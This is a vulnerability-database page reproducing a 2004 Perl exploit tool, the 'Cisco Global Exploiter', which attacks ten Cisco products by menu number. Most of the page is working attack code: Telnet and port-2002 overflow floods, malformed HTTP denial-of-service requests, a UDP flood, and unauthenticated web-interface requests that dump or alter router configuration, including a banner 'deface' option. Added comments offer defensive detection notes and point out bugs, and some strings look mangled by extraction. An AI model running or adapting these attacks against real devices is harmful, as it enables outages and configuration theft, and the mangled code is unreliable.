Cisco – Cisco Global Exploiter Tool

Cisco – Cisco Global Exploiter Tool

漏洞ID 1054428 漏洞类型
发布时间 2004-03-28 更新时间 2004-03-28
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/169
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl

##
#   Cisco Global Exploiter
#
#   Legal notes :
#   The BlackAngels staff refuse all responsibility
#   for incorrect or illegal use of this software
#   or for any resulting damage to other systems.
#
#   www blackangels it
##



############
# Modules ##
############

use Socket;
use IO::Socket;


#########
# Main ##
#########

# Entry point.  The target and the menu number are taken from fixed argv
# positions (index 1 and index 3); the option words printed by usage() are
# never inspected.  Both values stay package globals because every cisco<N>
# routine reads $host directly.
# NOTE(review): string literals are kept exactly as the page shows them; the
# escape sequences look like they were stripped when the page was extracted.
$host    = $ARGV[1];
$expvuln = $ARGV[3];

# usage() prints the menu and exits, so one combined test is enough.
usage() if $host eq "" || $expvuln eq "";

# Menu number -> routine.  Lookup is by exact string, as in an eq chain.
my %routine_for = (
    "1"  => \&cisco1,
    "2"  => \&cisco2,
    "3"  => \&cisco3,
    "4"  => \&cisco4,
    "5"  => \&cisco5,
    "6"  => \&cisco6,
    "7"  => \&cisco7,
    "8"  => \&cisco8,
    "9"  => \&cisco9,
    "10" => \&cisco10,
);

if (exists $routine_for{$expvuln}) {
    $routine_for{$expvuln}->();
}
else {
    printf "nInvalid vulnerability number ...nn";
    exit(1);
}


##############
# Functions ##
##############

sub usage
{
  # Help text followed by the numbered menu.  The pieces are written in
  # order with nothing between them, then the program stops with status 1.
  my @pieces = (
    "nUsage :n",
    "perl cge.pl -h <host> -v <vulnerability number>nn",
    "Vulnerabilities list :n",
    "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerabilityn",
    "[2] - Cisco IOS Router Denial of Service Vulnerabilityn",
    "[3] - Cisco IOS HTTP Auth Vulnerabilityn",
    "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerabilityn",
    "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerabilityn",
    "[6] - Cisco 675 Web Administration Denial of Service Vulnerabilityn",
    "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerabilityn",
    "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerabilityn",
    "[9] - Cisco 514 UDP Flood Denial of Service Vulnerabilityn",
    "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerabilitynn",
  );

  foreach my $piece (@pieces) {
    printf "%s", $piece;
  }

  exit(1);
}

# cisco1 -- oversized-input test against a Telnet listener on $host.
# The routine builds one long string by repeating a fixed pattern 30000
# times, writes it (followed by "1512") over a single TCP connection, echoes
# anything the peer returns, and then opens a second connection to judge
# whether the service still answers.  It never returns: it ends in die or
# exit(1).
# Defender's view: the observable is one Telnet session carrying a very
# large, highly repetitive payload.  Limiting management access to trusted
# hosts and running vendor-fixed firmware are the usual controls.
sub cisco1              # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
  # Target is the package global set at startup.
  my $serv = $host;
  my $dch = "?????????????????a~                %%%%%XX%%%%%"; 
  my $num = 30000;
  # Pattern repeated $num times; $string is freshly declared, so .= acts as =.
  my $string .= $dch x $num; 
  my $shc="1512";

  # Port is given as the string "(23)", kept as shown on the page.
  my $sockd = IO::Socket::INET->new (
                                     Proto    => "tcp",
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     ) || die("No telnet server detected on $serv ...nn");

  $sockd->autoflush(1);
  print $sockd "$string". $shc;
  # Echo the peer's output until it closes the connection.
  while (<$sockd>){ print }
  print("nPacket sent ...n");
  sleep(1);
  print("Now checking server's status ...n");
  sleep(2);

  # Availability probe: a failed re-connect is reported as "down".
  my $sockd2 = IO::Socket::INET->new (
                                      Proto    => "tcp",
                                      PeerAddr => $serv,
                                      PeerPort => "(23)",
                                      ) || die("Vulnerability successful exploited. Target server is down ...nn");

  print("Vulnerability unsuccessful exploited. Target server is still up ...nn");   
  exit(1);
}

# cisco2 -- malformed-request availability test against the web server of
# $host.  One HTTP request whose path is "/%%" is written to the port given
# as "http(80)", the socket is closed, and a second connection attempt
# decides which verdict is printed.  The routine ends in die or exit(1).
# Defender's view: a request line with the path "/%%" is the string to look
# for in web or proxy logs.  Where the device's web server is not needed,
# turning it off (`no ip http server` on IOS) removes the exposure;
# otherwise restrict it to management hosts and run fixed software.
sub cisco2              # Cisco IOS Router Denial of Service Vulnerability
{
  my $serv = $host;

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...nn"};
  $sockd->autoflush(1);
  print $sockd "GET /%% HTTP/1.0nn";
  # NOTE(review): the leading "-" is reproduced as shown on the page.
  -close $sockd;
  print "Packet sent ...n";
  sleep(1);
  print("Now checking server's status ...n");
  sleep(2);

  # Availability probe: a failed re-connect is reported as "down".
  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...nn"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...nn");   
  exit(1);
}

# cisco3 -- checks whether the web interface of $host answers requests under
# "/level/<n>/exec/" without demanding credentials.  <n> is swept upward
# from 16 while it is below 100; each response is lower-cased and searched
# for a 401 or 200 status line, and the sweep stops at the first pass where
# the flag $fg is not 1.
# NOTE(review): $fg starts at 0 and changes only when one of the two status
# lines is seen, so a host that returns neither is reported as affected on
# the first pass.  Treat the printed verdict as unreliable.
# Defender's view: many "/level/NN/exec/" requests with NN increasing, from
# one source in quick succession, form a distinctive log signature.
# Disable the device's web server where it is not needed, restrict it to
# management hosts, and run fixed software.
sub cisco3              # Cisco IOS HTTP Auth Vulnerability
{
  my $serv= $host;
  my $n=16;
  my $port=80;
  my $target = inet_aton($serv);
  my $fg = 0;

  LAB: while ($n<100) { 
  my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0rnrn");
  $n++;
  # NOTE(review): the two status-line patterns are reproduced as extracted;
  # they do not look like valid Perl as shown.
  foreach $line (@results){
          $line=~ tr/A-Z/a-z/;
          if ($line =~ /http/1.0 401 unauthorized/) {$fg=1;}
          if ($line =~ /http/1.0 200 ok/) {$fg=0;}
  }  

  if ($fg==1) {
               sleep(2);
               print "Vulnerability unsuccessful exploited ...nnr";
              }
  else {
        sleep(2);
        print "Vulnerability successful exploited with [http://$serv/level/$n/exec/....] ...nnr"; 
        last LAB; 
       }

  # Helper: opens a TCP connection on the bareword handle S, writes the
  # request passed in, and returns every line read back.  It reads $port,
  # $target and $serv from the enclosing routine.
  sub exploit {
               my ($pstr)=@_;
               socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
               die("Unable to initialize socket ...nn");
               if(connect(S,pack "SnA4x8",2,$port,$target)){
                                                            my @in;
                                                            # Make S the default output handle, unbuffered, for the print below.
                                                            select(S);      
                                                            $|=1;  
                                                            print $pstr;
                                                            while(<S>){ push @in, $_;}
                                                            select(STDOUT); close(S); return @in;
                                                           } 
  else { die("No http server detected on $serv ...nn"); }
  }
  }    
  exit(1);
}

# cisco4 -- interactive follow-up to the "/level/<n>/exec/" check.  <n> is
# swept upward from 16 while it is below 100.  When the response text held
# in the global $wr contains "200 ok", the operator is offered three
# actions, each issued as one more unauthenticated HTTP request: set the
# login banner, fetch the configuration, or request an operator-typed path.
# The menu loop has no exit path in the code shown.  If no pass matches,
# the routine dies.
# Defender's view: the impact is configuration disclosure and configuration
# change through the web interface.  Look for "/level/NN/exec/" requests,
# especially ones containing "/configure/" or "show%20conf".  If a device
# was reachable this way, treat credentials stored in its configuration as
# exposed and review the banner and the vty access lists for tampering.
sub cisco4              # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
  my $serv = $host;
  my $n = 16;

  while ($n <100) { 
                   exploit1("GET /level/$n/exec/- HTTP/1.0nn");
                   # Pattern reproduced as extracted.
                   $wr =~ s/n//g;
                   if ($wr =~ /200 ok/) { 
                                              while(1)
                                              { print "nVulnerability could be successful exploited. Please choose a type of attack :n";
                                                print "[1] Banner changen";
                                                print "[2] List vty 0 4 acl infon";
                                                print "[3] Othern";
                                                print "Enter a valid option [ 1 - 2 - 3 ] : ";
                                                $vuln = <STDIN>; 
                                                chomp($vuln);

                   # Option 1: the typed line is placed in a banner/motd configuration request.
                   if ($vuln == 1) { 
                                    print "nEnter deface line : ";
                                    $vuln = <STDIN>; 
                                    chomp($vuln);
                                    exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0nn");
                                   }
                   # Option 2: request the configuration and print the reply.
                   elsif ($vuln == 2) { 
                                       exploit1("GET /level/$n/exec/show%20conf HTTP/1.0nn"); 
                                       print "$wrf";
                                      } 
                   # Option 3: request an operator-typed path and print the reply.
                   elsif ($vuln == 3) 
                                      { print "nEnter attack URL : ";
                                        $vuln = <STDIN>; 
                                        chomp($vuln);
                                        exploit1("GET /$vuln HTTP/1.0nn");
                                        print "$wrf";
                                      }
         }
         }
         # Reset the response buffer before the next pass.
         $wr = ""; 
         $n++;
  }
  die "Vulnerability unsuccessful exploited ...nn";

  # Helper: one HTTP request to port 80 with a 5-second connect timeout.
  # The reply is appended to the global $wr and then copied to $wrf.
  sub exploit1 { 
                my $sockd = IO::Socket::INET -> new (
                                                     Proto    => 'tcp',
                                                     PeerAddr => $serv,
                                                     PeerPort  => 80,
                                                     Type      => SOCK_STREAM,
                                                     Timeout   => 5);
                                                     unless($sockd){die "No http server detected on $serv ...nn"}
  $sockd->autoflush(1);
  $sockd -> send($_[0]);
  while(<$sockd>){$wr .= $_} $wrf = $wr;
  close $sockd;
  } 
  exit(1);  
}

# cisco5 -- writes a short string that is not an SSH identification banner
# to TCP port 22 of $host, then closes the socket and exits.  No reply is
# read and no availability check follows.
# Defender's view: an SSH listener receiving non-protocol bytes immediately
# after connect is the observable.  Limit SSH on network devices to
# management networks and run fixed software.
sub cisco5              # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
  my $serv = $host; 
  my $port = 22; 
  my $vuln = "a%a%a%a%a%a%a%";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto    => "tcp")
                                     || die "No ssh server detected on $serv ...nn";

  # The status line is printed before the data is actually written.
  print "Packet sent ...n";
  print $sockd "$vuln";
  close($sockd);
  exit(1);
}

# cisco6 -- sends one HTTP request whose target is a bare "?" to port 80 of
# $host, waits two seconds, then closes the socket and exits.
# Defender's view: a request line of the form "GET ? HTTP/1.0" is the string
# to look for in logs.  Restrict the device's web administration interface
# to management hosts, or disable it where it is not needed.
sub cisco6              # Cisco 675 Web Administration Denial of Service Vulnerability
{
  my $serv = $host; 
  my $port = 80; 
  my $vuln = "GET ? HTTP/1.0nn";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto    => "tcp")
                                     || die "No http server detected on $serv ...nn";

  print "Packet sent ...n";
  print $sockd "$vuln";
  sleep(2);
  # Only the heading is printed; this routine never reads from the socket.
  print "nServer response :nn";
  close($sockd);   
  exit(1);
}

# cisco7 -- requests a path under "/exec" from the web interface of $host
# and prints whatever comes back.  The path is read from STDIN; an empty
# answer selects "/show/config/cr".  The request text is stored in the
# package global $vuln, which is not declared with my here.
# Defender's view: requests under "/exec/" that return command output
# without credentials expose the device configuration.  Restrict or disable
# the switch's web interface and run fixed software.  If such requests show
# up in logs, treat secrets stored in the configuration as exposed.
sub cisco7              # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
  my $serv = $host; 
  my $port = 80; 
  my $k = "";
  
  print "Enter a file to read [ /show/config/cr set as default ] : ";
  $k = <STDIN>;
  chomp ($k);
  # Empty input falls back to the default path.
  if ($k eq "")
  {$vuln = "GET /exec/show/config/cr HTTP/1.0nn";}
  else
  {$vuln = "GET /exec$k HTTP/1.0nn";}

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto    => "tcp")
                                     || die "No http server detected on $serv ...nn";

  print "Packet sent ...n";
  print $sockd "$vuln";
  sleep(2);
  print "nServer response :nn";
  # Echo the reply until the peer closes the connection.
  while (<$sockd>){print}
  close($sockd);   
  exit(1);
}

# cisco8 -- sends one HTTP request for "/error?/" to port 80 of $host,
# prints the reply, and exits.
# Defender's view: a request path of exactly "/error?/" is the string to
# look for in logs.  Disable the device's web server where it is not needed
# (`no ip http server` on IOS), or restrict it to management hosts, and run
# fixed software.
sub cisco8              # Cisco IOS Software HTTP Request Denial of Service Vulnerability 
{
  my $serv = $host; 
  my $port = 80; 
  my $vuln = "GET /error?/ HTTP/1.0nn";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto    => "tcp")
                                     || die "No http server detected on $serv ...nn";

  print "Packet sent ...n";
  print $sockd "$vuln";
  sleep(2);
  print "nServer response :nn";
  # Echo the reply until the peer closes the connection.
  while (<$sockd>){print}
  close($sockd);   
  exit(1);
}

# cisco9 -- issues 10000 send() calls on a datagram socket addressed to port
# 514 of $host.  It then asks the operator for a TCP port known to be open
# and tries to connect to it as an availability check.  The routine ends in
# die or exit(1).
# Defender's view: a burst of datagrams to UDP/514 from one source is the
# observable.  Filter UDP/514 from untrusted networks at the edge and apply
# control-plane rate limiting where the platform supports it.
sub cisco9              # Cisco 514 UDP Flood Denial of Service Vulnerability
{
  my $ip = $host;
  my $port = "514";
  my $ports = ""; 
  my $size = "";
  my $i = "";

  print "Input packets size : ";
  $size = <STDIN>; 
  chomp($size);

  # Datagram socket on the bareword handle SS; protocol number 17 is UDP.
  # The return value of socket() is not checked.
  socket(SS, PF_INET, SOCK_DGRAM, 17);
  my $iaddr = inet_aton("$ip");

  for ($i=0; $i<10000; $i++) 
  {send(SS, 0, $size, sockaddr_in($port, $iaddr));}

  printf "nPackets sent ...n";
  sleep(2);
  printf "Please enter a server's open port : ";
  $ports = <STDIN>;
  chomp $ports;
  printf "nNow checking server status ...n";
  sleep(2);

  # Availability probe: a failed TCP connect is reported as "down".
  socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...nn";
  my $dest = sockaddr_in ($ports, inet_aton($ip));
  connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...nn";

  printf "Vulnerability unsuccessful exploited. Target server is still up ...nn";
  exit(1);
}

# cisco10 -- oversized-input test against the service on TCP port 2002 of
# $host.  A 12-character pattern is repeated 30000 times and written
# (followed by "1512") over one connection.  Any reply is echoed, then a
# second connection is attempted.  The routine ends in die or exit(1).
# NOTE(review): the guard after the second connect tests $sockd, the first
# handle, not $sockd2.  The printed verdict therefore does not reflect the
# re-connect result.
# Defender's view: the observable is one session to port 2002 carrying a
# very large, repetitive payload.  Keep the ACS administration port
# reachable only from management hosts and run fixed software.
sub cisco10             # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
  my $ip = $host;
  my $vln = "%%%%%XX%%%%%"; 
  my $num = 30000;
  # Pattern repeated $num times; $string is freshly declared, so .= acts as =.
  my $string .= $vln x $num; 
  my $shc="1512";

  my $sockd = IO::Socket::INET->new (
                                     Proto       => "tcp",
                                     PeerAddr    => $ip,
                                     PeerPort    => "(2002)",
                                    ) || die "Unable to connect to $ip:2002 ...nn";

  $sockd->autoflush(1);
  print $sockd "$string" . $shc;
  # Echo the peer's output until it closes the connection.
  while (<$sockd>){ print }
  print "Packet sent ...n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$ip,
                                      PeerPort=>"(2002)",);
                                      unless ($sockd){die "Vulnerability successful exploited. Target server is down ...nn"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...nn");   
  exit(1);
} 


# milw0rm.com [2004-03-28]
